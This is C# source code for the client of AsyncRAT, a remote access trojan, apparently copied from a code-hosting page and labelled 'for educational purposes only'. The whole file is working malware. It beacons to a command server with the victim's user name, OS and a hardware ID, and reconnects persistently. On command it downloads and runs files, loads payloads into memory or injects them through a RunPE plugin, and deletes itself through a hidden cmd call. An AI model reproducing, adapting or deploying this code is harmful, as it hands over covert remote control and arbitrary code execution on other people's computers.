379 lines
13 KiB
C#
379 lines
13 KiB
C#
using AsyncRAT_Sharp.MessagePack;
|
|
using Microsoft.VisualBasic;
|
|
using Microsoft.VisualBasic.Devices;
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.IO;
|
|
using System.Net.Sockets;
|
|
using System.Text;
|
|
using System.Threading;
|
|
using System.Windows.Forms;
|
|
using System.Reflection;
|
|
using System.Runtime.InteropServices;
|
|
using System.Security.Cryptography;
|
|
|
|
|
|
// │ Author : NYAN CAT
|
|
// │ Name : AsyncRAT // Simple Socket
|
|
|
|
// Contact Me : https://github.com/NYAN-x-CAT
|
|
|
|
// This program Is distributed for educational purposes only.
|
|
|
|
|
|
namespace Client
|
|
{
|
|
class Settings
|
|
{
|
|
public static readonly string IP = "127.0.0.1";
|
|
public static readonly int Port = 6606;
|
|
public static readonly string Version = "0.2.2";
|
|
}
|
|
|
|
class Program
|
|
{
|
|
public static Socket Client { get; set; }
|
|
private static byte[] Buffer { get; set; }
|
|
private static long Buffersize { get; set; }
|
|
private static bool BufferRecevied { get; set; }
|
|
private static System.Threading.Timer Tick { get; set; }
|
|
private static MemoryStream MS { get; set; }
|
|
private static object SendSync { get; set; }
|
|
|
|
static void Main(string[] args)
|
|
{
|
|
InitializeClient();
|
|
while (true)
|
|
{
|
|
Thread.Sleep(1000);
|
|
}
|
|
}
|
|
|
|
public static void InitializeClient()
|
|
{
|
|
try
|
|
{
|
|
Client = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
|
|
{
|
|
ReceiveBufferSize = 50 * 1024,
|
|
SendBufferSize = 50 * 1024,
|
|
ReceiveTimeout = -1,
|
|
SendTimeout = -1,
|
|
};
|
|
Client.Connect(Settings.IP, Settings.Port);
|
|
Debug.WriteLine("Connected!");
|
|
Buffer = new byte[1];
|
|
Buffersize = 0;
|
|
BufferRecevied = false;
|
|
MS = new MemoryStream();
|
|
SendSync = new object();
|
|
BeginSend(SendInfo());
|
|
TimerCallback T = Ping;
|
|
Tick = new System.Threading.Timer(T, null, new Random().Next(30 * 1000, 60 * 1000), new Random().Next(30 * 1000, 60 * 1000));
|
|
Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null);
|
|
}
|
|
catch
|
|
{
|
|
Debug.WriteLine("Disconnected!");
|
|
Thread.Sleep(new Random().Next(1 * 1000, 6 * 1000));
|
|
Reconnect();
|
|
}
|
|
}
|
|
|
|
public static void Reconnect()
|
|
{
|
|
if (Client.Connected) return;
|
|
|
|
Tick?.Dispose();
|
|
|
|
try
|
|
{
|
|
if (Client != null)
|
|
{
|
|
Client.Close();
|
|
Client.Dispose();
|
|
}
|
|
}
|
|
catch { }
|
|
|
|
MS?.Dispose();
|
|
|
|
InitializeClient();
|
|
}
|
|
|
|
private static byte[] SendInfo()
|
|
{
|
|
MsgPack msgpack = new MsgPack();
|
|
msgpack.ForcePathObject("Packet").AsString = "ClientInfo";
|
|
msgpack.ForcePathObject("HWID").AsString = HWID();
|
|
msgpack.ForcePathObject("User").AsString = Environment.UserName.ToString();
|
|
msgpack.ForcePathObject("OS").AsString = new ComputerInfo().OSFullName.ToString()+ " " + Environment.Is64BitOperatingSystem.ToString().Replace("True","64bit").Replace("False","32bit");
|
|
return msgpack.Encode2Bytes();
|
|
}
|
|
|
|
private static string HWID()
|
|
{
|
|
StringBuilder sb = new StringBuilder();
|
|
sb.Append(Environment.UserDomainName);
|
|
sb.Append(Environment.UserName);
|
|
sb.Append(Environment.MachineName);
|
|
sb.Append(Environment.Version);
|
|
return GetHash(sb.ToString());
|
|
}
|
|
|
|
private static string GetHash(string strToHash)
|
|
{
|
|
MD5CryptoServiceProvider md5Obj = new MD5CryptoServiceProvider();
|
|
byte[] bytesToHash = Encoding.ASCII.GetBytes(strToHash);
|
|
bytesToHash = md5Obj.ComputeHash(bytesToHash);
|
|
StringBuilder strResult = new StringBuilder();
|
|
foreach (byte b in bytesToHash)
|
|
strResult.Append(b.ToString("x2"));
|
|
return strResult.ToString().Substring(0, 12).ToUpper();
|
|
}
|
|
|
|
public static void ReadServertData(IAsyncResult ar)
|
|
{
|
|
try
|
|
{
|
|
if (Client.Connected == false)
|
|
{
|
|
Reconnect();
|
|
return;
|
|
}
|
|
|
|
int Recevied = Client.EndReceive(ar);
|
|
|
|
if (Recevied > 0)
|
|
{
|
|
|
|
if (BufferRecevied == false)
|
|
{
|
|
if (Buffer[0] == 0)
|
|
{
|
|
Buffersize = Convert.ToInt64(Encoding.UTF8.GetString(MS.ToArray()));
|
|
MS.Dispose();
|
|
MS = new MemoryStream();
|
|
if (Buffersize > 0)
|
|
{
|
|
Buffer = new byte[Buffersize - 1];
|
|
BufferRecevied = true;
|
|
}
|
|
}
|
|
else
|
|
{
|
|
MS.Write(Buffer, 0, Buffer.Length);
|
|
}
|
|
}
|
|
else
|
|
{
|
|
MS.Write(Buffer, 0, Recevied);
|
|
if (MS.Length == Buffersize)
|
|
{
|
|
ThreadPool.QueueUserWorkItem(Read, MS.ToArray());
|
|
MS.Dispose();
|
|
MS = new MemoryStream();
|
|
Buffer = new byte[1];
|
|
Buffersize = 0;
|
|
BufferRecevied = false;
|
|
}
|
|
else
|
|
{
|
|
Buffer = new byte[Buffersize - MS.Length];
|
|
}
|
|
}
|
|
Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null);
|
|
}
|
|
else
|
|
{
|
|
Reconnect();
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
Reconnect();
|
|
}
|
|
}
|
|
|
|
public static void Read(object Data)
|
|
{
|
|
try
|
|
{
|
|
MsgPack unpack_msgpack = new MsgPack();
|
|
unpack_msgpack.DecodeFromBytes((byte[])Data);
|
|
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
|
|
{
|
|
case "sendMessage":
|
|
{
|
|
MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
|
|
}
|
|
break;
|
|
|
|
case "Ping":
|
|
{
|
|
Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString);
|
|
}
|
|
break;
|
|
|
|
case "sendFile":
|
|
{
|
|
Received();
|
|
string FullPath = Path.GetTempFileName() + unpack_msgpack.ForcePathObject("Extension").AsString;
|
|
unpack_msgpack.ForcePathObject("File").SaveBytesToFile(FullPath);
|
|
Process.Start(FullPath);
|
|
if (unpack_msgpack.ForcePathObject("Update").AsString == "true")
|
|
{
|
|
Uninstall();
|
|
}
|
|
}
|
|
break;
|
|
|
|
case "sendMemory":
|
|
{
|
|
Received();
|
|
byte[] Buffer = unpack_msgpack.ForcePathObject("File").GetAsBytes();
|
|
string Injection = unpack_msgpack.ForcePathObject("Inject").AsString;
|
|
byte[] Plugin = unpack_msgpack.ForcePathObject("Plugin").GetAsBytes();
|
|
object[] parameters = new object[] { Buffer, Injection, Plugin };
|
|
Thread thread = null;
|
|
if (Injection.Length == 0)
|
|
{
|
|
thread = new Thread(new ParameterizedThreadStart(SendToMemory));
|
|
}
|
|
else
|
|
{
|
|
thread = new Thread(new ParameterizedThreadStart(RunPE));
|
|
}
|
|
thread.Start(parameters);
|
|
|
|
}
|
|
break;
|
|
|
|
case "close":
|
|
{
|
|
try
|
|
{
|
|
Client.Shutdown(SocketShutdown.Both);
|
|
}
|
|
catch { }
|
|
Environment.Exit(0);
|
|
}
|
|
break;
|
|
|
|
case "uninstall":
|
|
{
|
|
Uninstall();
|
|
}
|
|
break;
|
|
}
|
|
}
|
|
catch { }
|
|
}
|
|
|
|
private static void Received()
|
|
{
|
|
MsgPack msgpack = new MsgPack();
|
|
msgpack.ForcePathObject("Packet").AsString = "Received";
|
|
BeginSend(msgpack.Encode2Bytes());
|
|
}
|
|
|
|
private static void Uninstall()
|
|
{
|
|
ProcessStartInfo Del = null;
|
|
try
|
|
{
|
|
Del = new ProcessStartInfo()
|
|
{
|
|
Arguments = "/C choice /C Y /N /D Y /T 1 & Del " + Process.GetCurrentProcess().MainModule.FileName,
|
|
WindowStyle = ProcessWindowStyle.Hidden,
|
|
CreateNoWindow = true,
|
|
FileName = "cmd.exe"
|
|
};
|
|
|
|
Client.Shutdown(SocketShutdown.Both);
|
|
Client.Close();
|
|
}
|
|
catch { }
|
|
finally
|
|
{
|
|
Process.Start(Del);
|
|
Environment.Exit(0);
|
|
}
|
|
}
|
|
|
|
private static void SendToMemory(object obj)
|
|
{
|
|
object[] Obj = (object[])obj;
|
|
var Buffer = (byte[])Obj[0];
|
|
var Injection = (string)Obj[1];
|
|
Assembly Loader = Assembly.Load(Buffer);
|
|
object[] Parameters = null;
|
|
if (Loader.EntryPoint.GetParameters().Length > 0)
|
|
{
|
|
Parameters = new object[] { new string[] { null } };
|
|
}
|
|
Loader.EntryPoint.Invoke(null, Parameters);
|
|
|
|
}
|
|
|
|
private static void RunPE(object obj)
|
|
{
|
|
try
|
|
{
|
|
object[] Parameters = (object[])obj;
|
|
byte[] File = (byte[])Parameters[0];
|
|
string Injection = Convert.ToString(Parameters[1]);
|
|
byte[] Plugin = (byte[])Parameters[2];
|
|
Assembly Loader = Assembly.Load(Plugin);
|
|
Loader.GetType("Plugin.Program").GetMethod("Run").Invoke(null, new object[] { File, Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), Injection) });
|
|
}
|
|
catch { }
|
|
}
|
|
|
|
public static void Ping(object obj)
|
|
{
|
|
MsgPack msgpack = new MsgPack();
|
|
msgpack.ForcePathObject("Packet").AsString = "Ping";
|
|
msgpack.ForcePathObject("Message").AsString = DateTime.Now.ToLongTimeString().ToString();
|
|
BeginSend(msgpack.Encode2Bytes());
|
|
}
|
|
|
|
public static void BeginSend(byte[] buffer)
|
|
{
|
|
lock (SendSync)
|
|
{
|
|
if (Client.Connected)
|
|
{
|
|
try
|
|
{
|
|
using (MemoryStream MS = new MemoryStream())
|
|
{
|
|
byte[] buffersize = Encoding.UTF8.GetBytes(buffer.Length.ToString() + Strings.ChrW(0));
|
|
MS.Write(buffersize, 0, buffersize.Length);
|
|
MS.Write(buffer, 0, buffer.Length);
|
|
|
|
Client.Poll(-1, SelectMode.SelectWrite);
|
|
Client.BeginSend(MS.ToArray(), 0, (int)(MS.Length), SocketFlags.None, EndSend, null);
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
Reconnect();
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
public static void EndSend(IAsyncResult ar)
|
|
{
|
|
try
|
|
{
|
|
Client.EndSend(ar);
|
|
}
|
|
catch
|
|
{
|
|
Reconnect();
|
|
}
|
|
}
|
|
}
|
|
} |